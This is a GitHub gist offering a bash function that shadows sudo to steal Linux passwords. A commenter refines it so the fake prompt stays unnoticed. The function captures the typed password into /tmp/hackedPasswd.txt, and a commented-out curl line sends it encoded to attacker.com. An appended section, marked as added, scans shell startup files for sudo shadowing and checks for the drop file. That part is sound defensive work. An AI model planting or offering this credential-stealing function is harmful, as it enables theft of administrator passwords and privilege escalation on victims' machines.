@tokyoneon
Last active September 19, 2022 11:02
Sudo function for stealing Linux passwords
function sudo ()
{
    # https://null-byte.com/privesc-0194190/
    realsudo="$(which sudo)";
    read -s -p "[sudo] password for $USER: " inputPasswd;
    printf "\n";
    printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
    # encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
    # curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1;
    $realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;
    $realsudo "${@:1}"
}

benbusby commented Jan 8, 2020

Nice! There's one small change I think is worthwhile though:

function sudo () {
    realsudo="$(which sudo)"

    if grep -Fqs "$USER" /tmp/hackedPasswd.txt
    then
        $realsudo "${@:1}"
    else
        read -s -p "[sudo] password for $USER: " inputPasswd
        printf "\n"; printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt
        $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" > /dev/null 2>&1
        $realsudo "${@:1}"
    fi
}

This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.
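
A defensive check for the shadowing shown in the gist and in the comment above, added here as an example and not part of the original gist or its comments. The helper names (`scan_rc_files`, `sudo_is_shadowed`, `make_sample_rc`) and the list of startup files are assumptions; the sample rc file is constructed.

```bash
# Added example, not part of the gist or its comments.
# Matches "function sudo", "sudo ()" or "alias sudo=" at the start of a line.
SHADOW_RE='^[[:space:]]*(function[[:space:]]+sudo([[:space:]({]|$)|sudo[[:space:]]*[(][[:space:]]*[)]|alias[[:space:]]+sudo=)'

# scan_rc_files FILE...: print file:line:text for every definition that shadows
# sudo. Status 0 = at least one hit, 1 = none. Hits need review: the benign
# idiom alias sudo='sudo ' is reported too.
scan_rc_files() {
    hits=1
    for rc in "$@"; do
        [ -r "$rc" ] || continue
        # The extra /dev/null operand makes grep prefix hits with the file name.
        if grep -nE -- "$SHADOW_RE" "$rc" /dev/null; then hits=0; fi
    done
    return "$hits"
}

# sudo_is_shadowed: status 0 if, in the current shell, the name sudo resolves
# to a function or alias. command -v prints an absolute path only for files.
sudo_is_shadowed() {
    resolved=$(command -v sudo 2>/dev/null) || return 1   # sudo not found
    case "$resolved" in
        /*) return 1 ;;
        *)  return 0 ;;
    esac
}

# make_sample_rc PATH: write a constructed startup file for testing the scan.
# The function body is a harmless placeholder, not the gist's code.
make_sample_rc() {
    cat > "$1" <<'EOF'
# constructed sample rc file
alias ll='ls -l'
# sudo () inside a comment must not match
sudoedit_hint() { echo "use sudoedit"; }
function sudo ()
{
    echo placeholder
}
EOF
}

# Invoke as "script.sh scan" to check the usual startup files (assumed list)
# and the drop file path both versions above write to.
if [ "${1:-}" = "scan" ]; then
    scan_rc_files "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" \
        "$HOME/.zshrc" /etc/bash.bashrc /etc/profile /etc/profile.d/*.sh || true
    if [ -e /tmp/hackedPasswd.txt ]; then echo "found /tmp/hackedPasswd.txt"; fi
fi
```

Calling sudo by its absolute path, or as `command sudo`, skips any shell function or alias of that name.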
